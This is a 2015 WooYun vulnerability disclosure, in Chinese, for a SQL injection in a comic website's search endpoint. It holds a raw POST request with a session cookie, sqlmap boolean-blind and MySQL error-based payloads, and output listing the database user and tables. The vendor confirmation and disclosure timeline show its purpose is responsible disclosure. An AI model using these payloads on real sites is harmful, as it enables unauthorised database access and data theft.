乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-25: 细节已通知厂商并且等待厂商处理中 2015-05-26: 厂商已经确认,细节仅向厂商公开 2015-06-05: 细节向核心白帽子及相关领域专家公开 2015-06-15: 细节向普通白帽子公开 2015-06-25: 细节向实习白帽子公开 2015-07-10: 细节向公众公开
233
post注入POST /paxy/safeCampusSearch.html HTTP/1.1Content-Length: 142Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: www.muu.com.cnCookie: JSESSIONID=abcmO14VJs6AS6IHT_e2u; read1=13059%2C%E5%9B%9B%E5%8F%B6%E5%A8%83%E5%A8%83%E5%92%8C%E5%91%9C%E5%96%B5-%E9%AB%98%E8%80%83-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F13059%2F88003_1.html%2C%2Fcomics%2F13059%2F88003_1.html%2C2%2C19%2C1%2C1; /comics/8490=/comics/8490/50511_1.html; read2=13540%2C%E6%99%B4%E7%A9%BA%E4%B8%8B-%E7%AC%AC%E5%9B%9B%E5%9B%9E-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F13540%2F99880_1.html%2C%2Fcomics%2F13540%2F99880_1.html%2C4%2C15%2C1%2C9; /comics/5924=/comics/5924/76943_1.html; read3=14886%2C41%E5%8E%98%E7%B1%B3%E7%9A%84%E8%B6%85%E5%B9%B8%E7%A6%8F-+%E5%96%9C%E6%AC%A2%E5%B0%B1%E6%98%AF%E5%96%9C%E6%AC%A2%E5%95%8A%EF%BC%81-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F14886%2F113708_1.html%2C%2Fcomics%2F14886%2F113708_1.html%2C52%2C61%2C1%2C1; /comics/11237=/comics/11237/73834_1.html; read4=14722%2C%E4%BD%8E%E4%BF%97%E7%AC%91%E8%AF%B4-4%EF%BC%8C%E6%B8%85%E6%98%8E%E8%B8%8F%E9%9D%92-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F14722%2F110731_1.html%2C%2Fcomics%2F14722%2F110731_1.html%2C4%2C25%2C1%2C1; /comics/4219=/comics/4219/20209_1.html; read5=5157%2C%E6%94%BB%E5%8F%97%E5%B0%8F%E6%97%A5%E5%B8%B8%E7%B3%BB%E5%88%97-%E8%85%90*%E6%94%BB%E5%8F%97%E5%B0%8F%E6%97%A5%E5%B8%B8%E7%B3%BB%E5%88%9701-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F5157%2F24462_1.html%2C%2Fcomics%2F5157%2F24462_1.html%2C1%2C11%2C1%2C1; /comics/5157=/comics/5157/24462_1.html; /comics/2989=/comics/2989/66457_1.htmlHost: www.muu.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*content=
---Parameter: content (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: content=%' AND 3862=3862 AND '%'=' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: content=%' AND (SELECT 6038 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(6038=6038,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='---[18:49:39] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[18:49:39] [INFO] fetching current user[18:49:39] [INFO] retrieved: muu@%available databases [2]:[*] information_schema[*] muu_2014Database: muu_2014[163 tables]+----------------------------------+| category || forum || forum_posts || forum_topics || spider || t_view_1 || t_view_2 || t_w_u_view || tb_active || tb_ad || tb_ad_stat_visit || tb_admin_recommend || tb_album || tb_album_photo || tb_authorization || tb_authorization_work || tb_blacklist || tb_bookmark || tb_broadcast || tb_bulletin || tb_classify || tb_collection || tb_comment || tb_comment_reply || tb_commercial_favorite || tb_dic_bulltype || tb_dic_groupclass || tb_dic_hittype || tb_dic_logtype || tb_dic_progress || tb_dic_ratingtype || tb_dic_readerclass || tb_dic_readpermiss || tb_dic_recomtype || tb_dic_subjectclass || tb_dic_syslogtype || tb_dic_topicclass || tb_dic_usertype || tb_dic_workclass || tb_editor_follow || tb_email || tb_excavate || tb_excavate_album || tb_excavate_show || tb_flower_egg || tb_greet || tb_group || tb_group_member || tb_group_ship |。。。。。。。。。。。
~~
危害等级:高
漏洞Rank:20
确认时间:2015-05-26 09:36
谢谢白帽子
暂无